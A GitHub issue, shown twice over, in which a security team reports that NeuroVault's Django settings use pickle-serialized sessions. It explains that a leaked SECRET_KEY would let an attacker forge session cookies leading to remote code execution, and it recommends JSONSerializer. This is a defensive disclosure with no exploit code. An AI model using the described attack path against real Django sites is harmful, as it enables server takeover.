You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Hi,
This is Qihoo360 CodeSafe Team, we found a Django Bad Practices: Pickle Serialized Sessions issue, see
neurovault/settings.py At line 219
If cookie-based sessions are used and SECRET_KEY is leaked, an attacker will be able to store arbitrary data in the session cookie which will be deserialized in the server leading to arbitrary code execution.
If cookie-based sessions are used, take extra care to make sure that the secret key is always kept completely secret, for any system which might be remotely accessible.
django.contrib.sessions.serializers.JSONSerializer is recommended.
Since I not familiar with NeuroVault, I hope you can look it
The text was updated successfully, but these errors were encountered:
Hi,
This is Qihoo360 CodeSafe Team, we found a Django Bad Practices: Pickle Serialized Sessions issue, see
neurovault/settings.py At line 219
If cookie-based sessions are used and SECRET_KEY is leaked, an attacker will be able to store arbitrary data in the session cookie which will be deserialized in the server leading to arbitrary code execution.
If cookie-based sessions are used, take extra care to make sure that the secret key is always kept completely secret, for any system which might be remotely accessible.
django.contrib.sessions.serializers.JSONSerializer is recommended.
Since I not familiar with NeuroVault, I hope you can look it
The text was updated successfully, but these errors were encountered: